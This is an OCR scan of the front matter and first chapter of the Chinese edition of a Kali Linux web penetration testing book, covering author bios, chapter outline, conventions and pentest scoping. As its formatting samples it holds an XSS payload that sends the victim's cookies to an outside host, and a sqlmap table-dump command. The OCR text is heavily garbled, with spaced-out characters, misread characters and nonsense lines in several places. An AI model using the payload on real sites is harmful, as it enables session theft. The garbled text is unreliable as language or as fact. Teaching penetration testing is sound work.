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在 多 家 安全 公司 任 技术 解决 方案 架构 师 一 职 。 
Muniz 专 攻 网 络 安全 管理 ， 不 仅 拥 有 30 多 项 网 
络 安全 技术 认证 ， 而 且 具 有 丰富 的 财富 500 强 
及 政府 网 络 大 型 项 目 经 验 。 另 外 ， 他 还 是 各 安 

会 议 活 跃 的 演讲 人 ， 维 护 着 优秀 的 安全 与 产 
品 实现 网 站 TheSecurityBlogger.com。 
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国际 知名 网 络 安全 专家 ， 被 《福布斯 》 杂 志 

言 不 讳 地 称 为 “间谍 、 超 级 英雄 ”及 最 值得 关 
注 的 “46 位 美国 联邦 技术 专家 ”。 他 不 仅 为 
美国 国防 和 情报 机 构 设 计 进 攻 性 防御 机 制 ， 还 
帮助 其 他 组 织 机 构 防 御 地 下 网 络 组 织 的 渗透 攻 
击 ， 是 网 络 防御 、 移 动 应 用 风险 、 恶 意 软 件 、 

高 级 持续 性 威胁 ( APT ) 研究 以 及 上 暗 安全 方面 
项 目 以 及 详细 结构 设计 的 业内 领导 者 。 另 外 ， 

他 以 笔名 Dr. Chaos 维 护 着 网 络 反 间谍 与 网 络 
安全 技术 博客 DrChaos.com， 还 作为 网 络 安 
全 专家 接受 了 美国 全 国 公 共 广 播 电 台 的 采访 。 
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开源 软件 和 GNU/Linux 爱 好 者 ， 目 前 主要 关注 
移动 互联 网 应 用 和 信息 安全 。 


TORING 国 灵 程序 设计 丛书 


Webi$3silllixt 
使 用 Kali Linux 


Web Penetration Testing with Kali Linux 


人 民 邮 电 出 版 社 
北 京 


图 书 在 版 编目 CC I PO 数据 


Web 渗 透 测试 : 使 用 Kali Linux / ($) Be% 
(Muniz, J.) ，( 美 ) 拉 卡 尼 (Lakhani, A.) 著 ; 涵 父 译 . 
一 北京 : 人 民 邮 电 出 版 社 ，2014.8 

(图 灵 程 序 设 计 从 书 ) 

ISBN 978-7-115-36315-2 


I. Owe IIl. Ope OMe OW I. QLinuxt£ 
WEA IV. CDOTP316. 89 


中 国 版 本 图 书馆 CIP 数 据 核 字 (2014) 28142407 57 


内 容 提 要 

本 书 是 一 本 Web 渗透 测试 实践 指南 ， 全 面 讲解 如 何 使 用 Kali Linux 对 Web 应 用 进行 疹 透 测试 。 两 位 
安全 领域 的 专家 站 在 攻击 者 的 角度 ， 一 步 步 介 绍 了 竣 适 测试 基本 概念 、Kali Linux 配置 方式 ， 市 大 家 了 解 
如 何 收 集 信 息 并 发 现 攻 击 目标 ， 然 后 利用 各 种 漏 铀 发 起 攻击 ， 并 在 此 基础 之 上 学 会 涂 透 测 试 ， 笃 握 补 救 多 
受 攻击 系统 的 具体 技术 。 此 外 ， 书 中 还 给 出 了 搂 写 报告 的 最 佳 实践 ， 其 中 一 些 范 例 可 作为 握 写 可 执行 报告 
的 模板 。 

本 书 适 合 所 有 渗透 测试 及 对 Web 应 用 安全 感 兴趣 的 读者 , 特别 是 想 学 习 使 用 Kali Linux HJ ABS 275. 
有 BackTrack 经 难 的 读者 也 可 以 通过 本 书 了 解 这 两 代 工 具 包 的 差异 ， 学 悦 下 一 代 涂 透 测 斌 工具 和 技术 。 
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Orange Business Services. 


从 2009 年 开始 ，Nitin 就 大 力 倡 导 openSUSE， 并 且 利 用 业余 时 间 推 广 Linux 和 FEFOSS。 他 活跃 
于 各 种 用 户 组 和 开源 项 目 , 其 中 包括 openSUSE 项 目 、MATE Desktop 项 目 、 目 由 软件 基金 会 Free 
Software Foundation )、 毛 里 求 斯 Linux 用 户 组 以 及 毛里 求 斯 软件 工艺 社区 ( Mauritius Software 


Craftsmanship Community ). 


Nitin 襄 欢 编写 Bash、Perl 和 Python 脚 本 ,日 经 常 在 个 人 博客 上 发 布 项 目 成 果 。 他 最 近 的 项 目 
叫做 “Project Evil Genius”， 是 一 个 用 于 openSUSE 上 移植 /安装 渗透 测试 工具 的 脚本 。 他 编写 的 教 
程 经 党 被 翻译 为 各 种 语言 ， 在 开源 社区 共享 。Nitin 是 一 位 目 由 思想 者 ,时 尚 知 识 共 享 Baik 
各 个 领域 的 专业 人 士 。 
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Kalj 是 专业 安全 人 员 及 其 他 人 员 用 来 进行 安全 评估 的 活 透 测试 工具 库 ， 它 基于 Debian Linux. 
Kali 提 供 了 大 量 经 过 定制 的 工具 集 ， 用 来 找 出 和 利用 系统 中 的 漏洞 。 本 书 会 介绍 于 2013 年 3 月 13 
日 发 布 的 Kali Linux 中 的 一 些 工 具 以 及 其 他 一 些 开 源 工 具 。 


本 书 作为 一 本 指南 ， 专 为 那些 希望 将 Kali 引 入 Web 应 用 渗透 测试 的 专业 人 员 写 就 。 我 们 的 目 
标 是 找 出 针对 有 茶 项 特定 任务 的 最 佳 Kali 工 具 ， 提 供 使 用 这 些 工 具 的 细节 知识 ， 并 基于 专业 实战 经 
历 举 一 些 例子 ,说 明 可 以 获取 哪些 信息 用 于 最 终 交 付 的 报告 。Kali 包 含 各 种 各 样 的 程序 和 工具 。 
不 过 ， 本 书 着 重 介绍 的 是 那些 在 本 书 出 版 时 用 于 完成 特定 任务 的 杀手 级 工具 。 


本 书 各 半 是 按 现实 中 Web 应 用 渗透 测试 的 任务 划分 的 。 第 1 章 从 整体 上 介绍 渗透 测试 的 基本 
Bias. VARS EMR Kali Linux 环 境 的 背景 知识 ， 以 及 如 何 为 本 书 介 绍 的 内 容 配 置 Kali Linux. 
第 2 草 ~ 第 6 草 介 绍 各 种 Web 应 用 渗透 测试 的 概念 ， 包 括 一 些 配置 和 报告 实例 ， 用 来 说 明 我 们 介绍 
的 内 容 能 否 帮 你 达成 既定 目标 。 


第 7 章 介 绍 一 些 针对 前 面 几 章 提 到 的 匈 受 攻击 系统 的 补救 措施 。 第 8 章 介绍 所 与 报告 的 最 佳 实 
践 ， 并 提供 一 些 范例 ,它们 可 作为 摊 写 可 执行 水 平 报告 的 模板 。 本 书 这 么 组 织 的 初衷 ， 是 而 望 能 
指引 读者 用 Kali 中 包含 的 最 好 的 工具 来 实践 Web 应 用 的 渗透 测试 ， 并 能 为 读者 提供 补救 漏洞 的 步 
又 ， 谨 明 如 何 专业 地 呈现 抓 取 的 数据 。 


本 书 内 容 


第 1 章 “ 渗 透 测试 概要 及 环境 配置 ”介绍 进行 专业 的 渗透 测试 所 需要 的 基础 知识 。 内 容 包括 
渗透 测试 和 其 他 服务 之 间 的 区 别 、 方 法 论 概 要 及 其 所 针对 的 目标 Web 应 用 。 这 一 章 还 将 介绍 配置 
本 书 示 例 要 用 的 Kali Linux 环 境 所 需 的 步骤。 


第 2 章 “ 侦 穴 ” 介 绍 收集 目 标 信息 的 各 种 途径 。 内 容 集中 在 网 上 可 以 获取 的 主流 人 免费 工具 ， 
以 及 Kali Linux 中 Information Gathering 分 类 下 的 工具 。 


第 3 章 “ 服 务 器 端 攻击 ”主要 介绍 发 现 和 利用 Web 服 务 器 及 Web 应 用 中 的 漏洞 。 其 中 讲 到 的 
工具 在 Kali 或 其 他 开源 工具 套件 中 都 能 找到 。 
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第 5 章 “身份 认 证 攻击 ”主要 分 析 用 户 和 设备 如 何 进行 身份 验证 以 访问 Web 服 务 。 内 容 包括 
将 管理 身份 认证 会 话 的 过 程 作为 目标 、 在 主机 系统 中 存储 数据 ， 以 及 中 间 人 攻击 技术 。 这 一 曹 还 
会 简要 介绍 SQL 和 器 站 脚本 攻击 。 


第 6 章 “Web 攻 击 ” 主 要 介绍 如 何 欺 骗 Web 服 务 磅 ， 以 及 通过 源 洞 利用 工具 ( 如 训 览 带 漏 洞 
利用 、 代 理 攻击 和 密码 收集 ) 对 Web 应 用 造成 危害 。 这 一 章 还 将 介绍 使 用 拒绝 服务 攻击 技术 来 中 
靳 服务 的 一 些 方法 。 

第 7 章 “ 防 御 对 策 ” 介 绍 加 固 Web 应 用 和 Web 服 务 硕 的 一 些 最 佳 实践 。 内 容 包括 安全 基线 、 
补丁 管理 、 密 码 策略 ， 以 及 如 何 防御 前 几 音 介绍 的 攻击 方法 。 这 一 草 还 有 一 节 集 中 介绍 取证 ， 
为 正确 地 在 受 人 危害 设备 上 进行 调查 以 避免 额外 的 负面 作用 也 很 重要 。 

第 8 章 “ 渗 透 测 试 执 行 报告 ”介绍 撰写 专业 的 渗透 测试 后 服务 报告 的 一 些 最 佳 实践 。 内 容 包 
括 为 交付 结果 增值 的 方法 概述 ， 以 及 文档 格式 、 用 来 撰写 专业 报告 的 文档 模板 等 。 


读者 须知 


详尽 的 例子 来 介绍 如 何 使 用 Kali Linux 以 及 其 他 开源 应 用 中 提供 的 工具 执行 攻击 。 我 们 并 不 要 求 
读者 之 前 有 使 用 BackTrack 或 类 似 程 序 的 经 验 ， 有 则 更 好 。 


构建 实验 环境 和 安装 配置 Kali Linux 工 具 库 的 硬件 要 求 会 在 第 1 章 中 介绍 。 


目标 读者 


本 书面 向 专业 的 渗透 测试 人 员 , 或 期 望 最 大 程度 使 用 Kali Linux 来 进行 Web 服 务 硕 或 Web 应 用 
渗透 测试 的 人 员 。 如 末 你 希望 学 习 如 何 对 Web 应 用 进行 渗透 测试 ， 并 将 发 现 的 结果 呈现 给 客户 ， 
那么 本 书 正 适合 你 。 


排版 约定 
本 书 会 用 不 同 的 格式 区 分 不 同 的 信息 。 下 面 通过 例子 逐一 介绍 。 


正文 中 的 代码 这 样 表 示 :“ 举 个 例 于 ， 你 可 以 将 该 配置 文件 称 为 My First Scan， 或 是 其 他 
你 中 意 的 名 称 。 


代码 块 这 样 表示 : 


<script>document.write("<img src='http://kali.drchaos.com/var/www/xss_ 
lab/lab_script.php?"+document.cookie+"'>")</script> 


命令 行 输入 和 输出 这 样 表示 : 


sqlmap -u http://www.drchaous.com/article.php?id-5 -T tablesnamehere -U 
test --dump 


-U test -dump 


新 术语 或 关键 词 会 用 楷体 。 屏 各 截图 中 的 单词 这 样 标记 :“ 在 我 们 点 击 了 Execute 按 钮 后 ,就 
收 到 了 一 个 SQL 注 入 。” 


这 个 图 标 表 示警 告 或 重要 提醒 。 | 


这 个 图 标 表示 提示 或 技巧 。 


读者 反馈 
我 们 一 贯 欢 迎 读者 的 反馈 意见 。 你 可 以 告诉 我 们 阅读 此 书 的 感受 一 一 喜欢 哪些 内 容 以 及 不 喜 
欢 哪些 内 容 。 这 些 反 馈 对 于 协助 我 们 创作 出 真正 对 读者 有 所 神 益 的 内 容 至 关 重 要 。 
你 可 以 将 一 般 反 馈 以 电子 邮件 形式 发 送 到 feedback@packtpub.com ,并 在 邮件 标题 中 注 明 书 名 。 
如 果 你 在 某 一 方向 很 有 造 诈 ， 并 且 愿 意 著 书 或 参与 合 著 ， 可 以 参考 我 们 的 作者 指南 : 


www.packtpub.com/authors ; 


客户 支持 
现在 你 已 是 Packt 图 书 的 尊贵 读者 了 ， 为 了 让 你 的 付出 得 到 最 大 回报 ， 我 们 还 为 你 提供 了 其 
他 许多 方面 的 服务 ， 请 注意 以 下 信息 。 


勘误 


虽然 我 们 会 尽力 保证 内 容 的 准确 性 , 但 错误 在 所 难免 。 如 末 你 在 书 中 发 现任 何 文字 或 代码 错 
DX. 非常 欢迎 你 将 这 些 错 误 提 交 给 我 们 ， 这样 可 以 帮助 我 们 在 后 续 版 本 中 改正 错误 ,避免 其 他 读 


者 产生 不 必要 的 误解 。 如 果 你 发 现 了 错误 ， 请 访问 http:/www.packtpub.com/submit-errata， 选 择 相 
应 图 书 ， 点 击 errata submission form ( 提交 勘误 ) 链接 ， 然后 填写 具体 的 错误 信息 即 可 。 只 要 你 
提交 的 勘误 经 过 确认 ， 勘误 信息 就 会 上 传 到 我 们 的 网 站 ,或 是 添加 到 已 有 勘误 列表 中 ， 显示 在 该 
书 的 勘误 页 面 上 *”。 你 可 以 通过 在 http:/www.packtpub.com/support 选 择 书 名 来 查看 该 书 所 有 已 有 
勘误 。 


盗版 

对 所 有 媒体 来 说 ， 网 络 盗版 都 是 一 个 严峻 的 问题 。Packt 很 重视 版 权 保护 。 如 果 你 在 网 上 发 
现 我 们 公司 出 版 物 的 任何 非法 复制 品 , 请 及 时 告知 我 们 相关 网 址 或 网 站 名 称 ， 以 便 我 们 采取 补救 
措施 。 

举报 请 发 送 电 子 邮件 至 copyright@packtpub.com， 并 附 上 到 可 疑 盗版 材料 的 链接 。 

非常 感谢 你 帮助 我 们 保护 作者 权益 ， 提 供 有 价值 内 容 。 


问题 


如 果 你 有 和 针对 本 书 任何 方面 的 问题 ， 可 以 通过 questions@packtpub.com 联 系 我 们 ， 我 们 会 尽 
力 解决 。 


中 要 查阅 或 提交 本 书 中 文 版 勘误 请 访问 http://ituring.cn/book/1347。 一 一 编者 注 
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渗透 测试 概要 及 环境 配置 


许多 提供 安全 服务 的 机 构 会 使 用 一 些 术 语 ， 如 安全 审计 (security audit )、 网 络 或 风险 评估 
( network or risk accessment ),， 以 及 渗透 测试 ( penetration testing ) Xx IER iE TET MLA LS, 
从 定义 上 来 看 , 审计 是 对 系统 或 应 用 的 量化 的 技术 评 佑 。 安 全 评 佑 意 为 对 风险 的 评测 ， 是 指 用 以 
发 现 系统 、 应 用 和 过 程 中 存在 的 漏洞 的 服务 。 


渗透 测试 的 含义 则 不 只 是 评 佑 , 它 会 用 已 发 现 的 独 洞 来 进行 测试 , 以 验证 该 源 洞 是 真实 存在 
还 是 只 是 虚 慰 一 场 ( 假 阳性 ) 人 举 个 例 于 ， 审 计 或 评 佑 利用 的 是 扫 摘 工具 。 这 些 工具 会 显示 多 个 
系统 上 的 数 白 个 可 能 的 漏洞 。 而 渗透 测试 则 会 采用 恶意 黑客 的 惯用 手段 来 尝试 对 这 些 漏洞 进行 攻 
击 。 这 样 可 以 验证 哪些 漏洞 真实 存在 ， 从 而 可 以 将 实际 的 系统 漏洞 数 降 至 少量 。 最 有 效 的 渗透 测 
试 是 那些 针对 特定 系统 的 有 特定 目标 的 测试 。 质 胜 于 量 , 这 才 是 检验 成 功 渗透 测试 的 标准 。 TEA 
标 性 攻击 中 , 相 比 大 范围 攻击 , 对 单个 系统 进行 枚 举 攻击 更 能 呐 实 反映 系统 安全 中 的 问题 以 及 处 
理 突 发 情况 的 响应 时 间 。 只 要 仔细 选取 重要 的 目标 , 渗透 测试 人 员 就 可 以 确定 整体 的 安全 基础 提 
构 及 跟 重 要 资产 相关 的 风险 。 


| 渗透 测试 并 不 能 使 网 络 更 安全 1 | 


eS UL DRE, FATTER ho Baa eB REAR 
AACE NARS PY ea EAS PS ERR, ABABA A IT. TE A, 
我 们 建议 将 渗透 测试 服务 作为 验证 既 有 系统 安全 性 的 一 种 手段 。 REPU OARS T fc 
努力 来 保障 这 些 系统 的 安全 , 并 且 已 经 准备 好 评 佑 确保 系统 安全 的 措施 中 有 没有 漏洞 ,就 可 以 规 
划 渗 透 测试 了 。 


在 商定 渗透 测试 服务 时 , 确定 合理 的 工作 范围 非常 重要 , 工作 范围 决定 了 哪些 系统 和 应 用 应 
该 放 入 目标 列表 ,以 及 会 用 哪些 工具 来 利用 已 发 现 的 漏洞 。 最 好 的 方法 是 在 设计 环节 跟 客 户 一 起 
拟定 一 个 可 接受 的 、 不 对 结果 的 价值 造成 影响 的 工作 范围 。 


本 书 会 一 步 步 教 你 如 何 发 现 和 利用 Web 应 用 的 漏洞 。 其 中 , Kali Linux 是 BackTrack 的 进化 版 。 


2 第 1x 渗透 测试 概要 及 环境 配置 


本 书 介绍 的 内 容 包 括 对 目标 进行 调查 、 识 别 和 利用 Web 应 用 及 其 对 应 的 客户 问 的 漏洞 、 帮 助 Web 
服务 防御 常见 攻击 ， 以 及 为 专业 服务 活动 生成 可 交付 的 渗透 测试 结果 。 很 多 读者 会 因 本 书 受 益 ， 
无 论 是 新 人 想 成 为 渗透 测试 人 员 、 刚 开始 使 用 Kali Linux 而 想 了 解 Kali 和 BackTrack 之 间 的 差别 ， 
还 是 渗透 测试 的 老手 来 了 解 新 工具 和 新 技术 。 

本 章 将 逐一 介绍 支撑 各 种 安全 服务 的 基础 知识 , 并 提供 专业 渗透 测试 实践 所 需要 的 指引 。 内 
容 包 括 区 分 渗透 测试 和 其 他 服务 、 滩 透 测试 方法 论 概述 以 及 如 何 确 立 目 标 Web 应 用 。 本 草 还 会 俐 
要 介绍 如 何 搭 建 Kali Linux 测 试 环 境 和 真实 环境 。 


1.1 Web 应 用 渗透 测试 基础 


Web 应 用 是 指 那些 将 Web 浏 览 融 当做 客户 端的 应 用 。 这 个 范围 可 宽 可 备 。Web 应 用 正 是 因 服 
务 访问 方便 和 系统 可 集中 管理 而 流行 起 来 的 。 访 问 Web 应 用 的 条 件 就 是 要 符合 行业 中 Web 浏 览 才 
客户 端的 标准 ， 这 就 简化 了 对 Web 服 务 提供 商 和 访问 Web 应 用 的 客户 端的 要 求 。 


Web 己 用 是 在 所 有 企业 内 使 用 最 为 广泛 的 一 种 应 用 。 它 们 是 基于 因特网 的 应 用 中 的 绝 大 多 
数 ,， 成 为 了 事实 标准 。 仔 细 想 想 智 能 手机 和 平板 电脑 ， 其 实 这 些 设 备 上 的 大 多 数 应 用 也 是 Web 应 
用 。 这 就 给 专业 安全 人 员 和 善于 利用 这 些 系统 的 攻击 者 创造 了 一 个 全 新 的 、 范 围 更 广阔 的 多 目标 
环境 。 


Web 应 用 服务 的 种 类 繁多 、 业 务 用 途 广泛 , 因此 Web 应 用 渗透 测试 的 范围 也 要 因地制宜 。Web 
应 用 的 核心 层 包括 托管 服务 融 、 访 问 设备 以 及 数据 仓库 。 在 渗透 测试 中 , 各 层级 之 间 的 通信 也 应 
A AWWA s 


KETA — AN WebM R18 dU TA SHAH s Br BP] E — A Linux ll ade 1235 
Min, ETT as Ms Bee EIST HLA, AA NIS DESI DE BLTR TP Linux 7 ait PE 
(操作 系统 、 网 络 配置 等 )， 评 佑 服务 硕 上 托管 的 Web 应 用 ,评估 系统 和 用 户 间 的 号 份 验证 ， 以 及 
访问 服务 胡 的 客户 桨 说 备 和 这 三 个 层级 之 间 的 通信 。 其 他 可 以 列 和 人 测试 范围 的 领域 包括 员工 如 何 
获取 设备 、 除 了 访问 这 个 Web 应 用 之 外 设备 还 用 于 哪些 用 途 、 周 边 的 网 络 环境 、 系 统 的 维护 以 及 
服务 带 系 统 的 用 户 。 这 里 誉 两 个 例子 ,说明 为 什么 也 要 考虑 测试 范围 内 的 其 他 领域 。 比 如 这 些 
Linux 服 务 右 可 能 会 因 允 许 被 其 他 途径 影响 的 移动 设备 连接 而 泄露 机 密 信息 ， 或 是 通过 社交 媒 体 
获取 已 通过 号 份 验证 的 移动 设备 而 泄露 机 密 信 息 。 


在 第 8 草 中 ， 我 们 会 提供 确定 Web 应 用 渗透 测试 范围 的 一 些 模板 。 本 章 中 可 以 付 诸 实践 的 例 
子 古 提供 一 些 可 人 义 选 的 调查 表 ， 来 辅助 客户 一 步 步 确 定 Web 应 用 渗透 测试 工作 范围 的 可 能 目标 。 
每 项 工作 范围 部 应 该 能 根据 客户 的 业务 目标 、 期 望 执 行 的 时 间 段 、 分 配 的 资金 及 需要 的 结 来 而 进 
行 定制 。 如 前 所 述 ， 模 板 可 作为 辅助 确定 工作 范围 的 工具 。 
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1.2 ”渗透 测试 方法 


行业 里 有 一 些 进行 渗透 测试 的 建议 步骤 。 第 一 步 是 找 出 项 目的 起 始 状 态 。 最 常见 的 用 来 定义 
LRA AIBA Z EMIX (black box testing) 4 3X; (white box testing )， 或 是 介 于 二 者 之 
HRR CARAKAN (gray box testing )。 


壮 盒 测试 假定 渗透 测试 人 员 和 期 对 目标 网 络 、 公 司 流程 或 应 用 提供 的 服务 没有 了 解 。 局 动 
盒 测 试 项 目 需要 做 大 量 的 侦察 ， 而 且 还 需要 长 期 跟踪 。 因 为 现实 中 的 攻击 者 在 发 起 攻击 前 可 能 会 
对 目标 进行 长 期 学 习 。 


作为 专业 安全 人 员 , 我 们 发 现在 确立 渗透 测试 范 于 方面 ,墨盒 测试 存在 一 些 问题 。 我 们 很 难 
舍 量 侦察 阶段 会 持续 多 长 时 间 , 它 完全 取决 于 系统 和 你 对 环境 的 束 悉 程度 。 这 通 币 会 市 来 计 惕 问 
题 。 大 多 数 情 况 下 ， 客 户 郡 不 会 同意 给 你 留 一 张 空 白文 票 让 你 在 侦察 阶段 花费 无 限时 间 和 资源 。 
但 如 末 没 有 投入 足够 的 时 间 , 你 的 渗透 测试 在 开始 前 就 已 经 失败 了 。 而 且 这 么 做 也 不 现实 。 动 机 
明确 的 攻击 者 不 可 能 跟 专 业 的 渗透 测试 人 员 面 对 相同 的 测试 范围 和 计 费 限制 。 这 也 是 为 什么 我 们 
推荐 灰 盒 测试 而 不 是 装 盒 测试 的 原因 。 


盒 测 试 是 当 渗 透 测 试 人 员 对 系统 非 弟 熟悉 时 采取 的 方法 ,日 盒 竣 透 测 试 的 目标 是 明确 定义 
好 的 ， 而 测试 报告 的 结果 通常 是 有 预期 的 。 测 试 人 员 会 接触 目标 的 详细 信息 ， 如 网 络 信息 、 系 统 
类 型 、 公 司 流程 和 服务 每。 日 盒 测试 通 弟 关注 的 都 是 某 个 特定 业务 对 象 ( 如 满足 特定 需求 )， 而 
不 是 普通 评 佑 。 因 此 它 持续 的 时 间 一 般 较 短 ， 具体 取决 于 目标 空间 的 限制 。 日 使 测 试 任务 可 以 降 
低 信 息 收 集 〈 如 侦察 服务 ) 的 成 本 ， 从 而 降低 渗透 测试 的 费用 。 


| 公司 内 部 的 安全 团队 通 第 会 执行 白 盒 测试 。 | 


REMASTER, ARS A A eRe: 在 侦 
察 环节 中 最 终 会 发 现 一 些 不 确定 信息 ， 但 渗透 测试 人 员 可 以 忽略 这 部 分 信息 。 渗 透 测 试 人 员 会 
知 近 目标 的 一 些 基 本 情况 ; 不 过 ， 系 统 内 部 工作 原理 和 其 他 一 些 受 限 信息 仍然 不 会 公开 给 渗透 
测试 人 员 。 


真实 的 攻击 者 会 在 对 日 标 实施 攻击 之 前 收集 目标 的 一 些 信息 。 大 多 数 攻 击 者 (脚本 小 于 或 是 
下 载 并 运行 工具 来 执行 攻击 的 那些 人 ) 不 会 选择 随机 目标 。 他 们 的 动机 都 非常 明确 ,而 且 他 们 通 
常会 在 尝试 攻击 之 前 跟 目 标 进 行 一 定 程度 的 交互 。 对 许多 专业 安全 人 员 来 说 , 灰 盒 测试 是 进行 渗 
透 测 试 的 一 个 很 有 吸引 力 的 选择 , 因为 它 跟 攻 击 者 实际 采用 的 方法 相似 , 而 且 侧重 于 发 现 漏洞 过 
程 而 非 侦 察 过 程 。 


工作 范围 中 定义 了 如 何 局 动 和 执行 渗透 服务 。 局 动 渗透 测试 服务 的 过 程 应 该 包含 信息 收集 的 
环 记 一 一 用 于 记录 目标 环境 并 定义 任务 的 界限 ( 以 避免 不 必要 的 侦察 服务 或 是 攻击 任务 范围 外 的 
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系统 )。 完 整定 义 的 工作 范围 能 够 带 助 服务 提供 商 避 人 免 范围 蔓延 《 即 项 目的 范围 不 受 控制 地 变更 
或 是 不 断 地 扩大 入 在 期 望 时 间 内 开展 工作 ， 并 能 在 执行 任务 时 提供 更 精确 的 结 采 。 


真实 的 攻击 并 没有 寞 限 ， 如 时 间 、 资 金 、 违 德 准则 或 是 工具 方面 的 界限 。 这 也 就 意味 着 对 渗 
透 测 试 的 范围 进行 限制 可 能 无 法 匹配 实际 的 场景 。 跟 限定 范围 相 比 ,如 采 渗 透 测 试 在 攻击 到 关键 
的 系统 之 前 承 已 经 结束 ,那么 不 设 定 范围 可 能 永远 也 不 会 测试 到 关键 漏洞 。 举 个 例 于 ,渗透 测试 
人 员 可 能 会 以 截获 发 往 关 键 系 统 的 用 户 凭 据 并 成 功 访 问 这 些 系统 来 收尾 , 那么 他 就 会 漏 测 这 些 系 
统 是 否 容易 遭受 网 络 攻击 。 在 工作 范围 中 加 上 哪些 人 应 该 知悉 渗透 测试 也 很 重要 。 真 实 的 攻击 者 
可 能 会 随时 发 起 攻击 ， 而 且 很 可 能 是 在 人 们 最 放松 警惕 的 时 候 。 


确立 渗透 测试 工作 范围 的 基本 条 件 如 下 。 


O 目标 系统 的 定义 。 用 以 指定 应 该 测试 哪些 系统 ， 其 中 包括 目标 在 网 络 中 的 位 置 、 系 统 的 
类 型 以 及 这 些 系 统 的 商业 用 途 。 

O 执行 工作 的 时 间 表 。 测 试 应 该 何 时 开始 以 及 何 时 达到 特定 目标 的 时 间 表 。 最 佳 实践 吓 不 
要 将 时 间 范 围 限制 到 办 公 时 间 内 。 

O 如 何 测试 目标 。 人 允许 /不 允许 采用 什么 类 型 的 测试 方法 ?如 扫描 或 漏洞 利用 。 人 允许 采用 特 
定 测 试 方法 会 引入 什么 样 的 风险 ”如 因 渗 透 测试 中 的 尝试 导致 系 统 变 得 不 可 用 会 造成 什 
么 影响 ?例子 包括 扮 成 员工 使 用 社交 网 络 ， 对 关键 系统 实施 的 拒绝 服务 攻击 ， 或 是 在 被 
攻陷 的 服务 大 上 执行 脚本 。 有 些 攻击 方法 可 能 更 容 多 造成 系统 破坏 。 

O 工具 和 软件 。 在 渗透 测试 过 程 中 会 用 到 哪些 工具 和 软件 ? 这 很 重要 ， 但 依然 存在 争议 。 
许多 专业 安全 人 员 认 为 ,如 果 他 们 透露 了 日 己 的 工具 ,就 相当 于 泄露 了 目 己 的 秘密 武 冀 。 
我 们 认为 ， 除 非 你 想 采 用 广泛 使 用 的 商业 产品 并 将 这 些 产品 输出 的 报告 拼凑 之 后 重新 包 
装 ， 人 否则 就 应 该 将 用 到 的 工具 告诉 客户 。 菏 些 情况 下 ， 如 有 会 利用 痢 洞 ， 甚 至 应 该 告诉 
用 户 利用 漏洞 时 使 用 的 工具 中 对 应 的 命令 。 这 样 漏洞 利用 就 可 以 被 重 现 ， 从 而 使 得 客户 
可 以 真正 理解 系统 是 如 何 被 攻破 的 ， 以 及 发 现 该 漏洞 的 利用 有 多 难 。 

Q 被 通知 方 。 谁 知 违 该 项 渗透 测试 ?是 否 提前 通知 到 他 们 了? 他们 能 在 渗透 测试 开始 前 准 
备 好 吗 ? 对 渗透 测试 的 啊 应 是 否 是 测试 工作 范围 内 说 明 的 ? 如 果 答 案 是 肯定 的 ， 那 么 在 
渗透 测试 开始 前 不 通知 安全 运 维 团 队 就 合乎 情理 。 在 对 托管 到 第 三 方 (如 云 服务 提供 商 ) 
的 Web 应 用 进行 渗透 测试 时 , 这 一 点 非常 重要 , 因为 服务 提供 商 可 能 会 受 渗 透 测试 的 影 啊 。 

O 初始 访问 等 级 。 在 开始 渗透 测试 前 ， 你 得 到 的 是 什么 类 型 的 信息 和 权限 ? 渗透 测试 人 员 
征 通过 互联 网 和 /或 局 域 网 来 访问 服务 融 吗 ? 最 开始 给 你 的 是 什么 账户 等 级 的 访问 权限 ? 
这 个 测试 是 针对 每 个 目标 的 黑 盒 、 日 盒 或 灰 盒 任务 吗 ? 

a 目标 空间 定义 。 它 会 定义 渗透 测试 中 需要 窗 盖 的 指定 的 业务 功能 。 举 个 例子 ， 对 销售 使 
用 的 某 个 特定 Web 应 用 进行 渗透 测试 ， 而 不 要 动 由 同 个 服务 侣 托管 的 其 他 应 用 。 

O 标识 关键 运营 区 域 。 定 义 渗透 测试 中 应 该 避让 的 系统 ， 防 止 渗透 测试 给 其 市 来 负面 影 啊 。 
在 用 的 号 份 认 证 服务 融 超 过 它 的 上 限 了 吗 ? 在 开始 对 目标 进行 渗透 测试 前 ， 明 确 关 键 资 
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产 非常 重要 。 

O 对 退出 的 定义 。 说 明 渗 透 测 试 对 系统 或 进程 的 危害 到 什么 程度 很 重要 。 数 据 应 该 从 网 络 
上 删除 ,还 是 攻击 者 只 是 获取 特定 层级 的 非 授 权 访 问 即 可 ? 

O 交付 的 结果 。 期 望 的 最 终 报 告 是 什么 类 型 的 ?客户 指定 在 完成 渗透 测试 服务 合约 时 应 该 
达到 什么 目标 ? 要 确保 目标 不 是 无 期 限 的 ， 避 免 期 望 的 服务 出 现 范围 破 延 。 数 据 是 分 类 
数据 还 是 为 特定 人 群 设 定 的 ? 最 终 报 告 以 什么 形式 交付 ? 跟 客 户 交 付 一 个 样板 报告 或 是 
阶段 性 更 新 也 很 重要 ， 这 样 在 最 终 报 告 中 就 不 会 存在 太 大 的 分 政 。 

Q 对 补救 的 期 望 。 记 录 漏 润 时 要 把 可 能 的 补救 措施 一 起 记录 下 来 吗 ? 在 执行 渗透 测试 的 过 
程 中 如 果 导 人 致 菏 个 系统 不 可 用 了 应 该 通知 谁 ?” 许 多 渗透 测试 服务 都 不 包括 针对 发 现 的 问 
题 的 补救 措施 。 


应 该 用 于 定义 服务 范围 的 一 些 服务 定义 如 下 所 述 。 


O 安全 审计 。 通 过 一 组 标准 或 基线 来 评测 系统 或 应 用 的 风险 等 级 。 标 准 意 为 强制 规则 ， 而 
基线 意 为 最 低 的 可 接受 安全 等 级 。 在 安全 实施 中 ， 标 准 和 基线 也 还 是 沿用 前 面 的 定义 ， 
并 且 都 会 因 行 业 、 撤 术 和 过 程 的 不 同 而 不 同 。 


大 多 数 针对 审计 的 安全 需求 都 集中 在 通过 一 些 官方 审计 ( 如 准备 应 对 公司 或 政府 的 审计 ) 
或 是 证 明基 线 需求 已 经 满足 了 一 组 规定 的 强制 规则 ( 如 还 循 HPAA 和 HITECH 在 你 护 医疗 记 
录 方 面 的 规定 ) 告诉 潜在 客户 ,如果 在 服务 结束 后 审计 未 通过 , 你 的 审计 服务 还 会 附 融 提 
供 一 定 的 保险 或 保护 ， 这 很 重要 。 还 有 记录 审计 服务 中 包含 的 补救 类 型 也 很 重要 。 换 句 话 
说 ， 你 是 否 要 在 找 出 问题 时 提供 补救 措施 方案 或 是 修复 问题 。 合 规 性 审计 远 不 止 运行 一 个 
安全 工具 。 写 非常 依赖 标准 的 报告 以 及 是 否 齐 循 了 对 该 审计 来 次 是 可 接受 标准 的 方法 。 


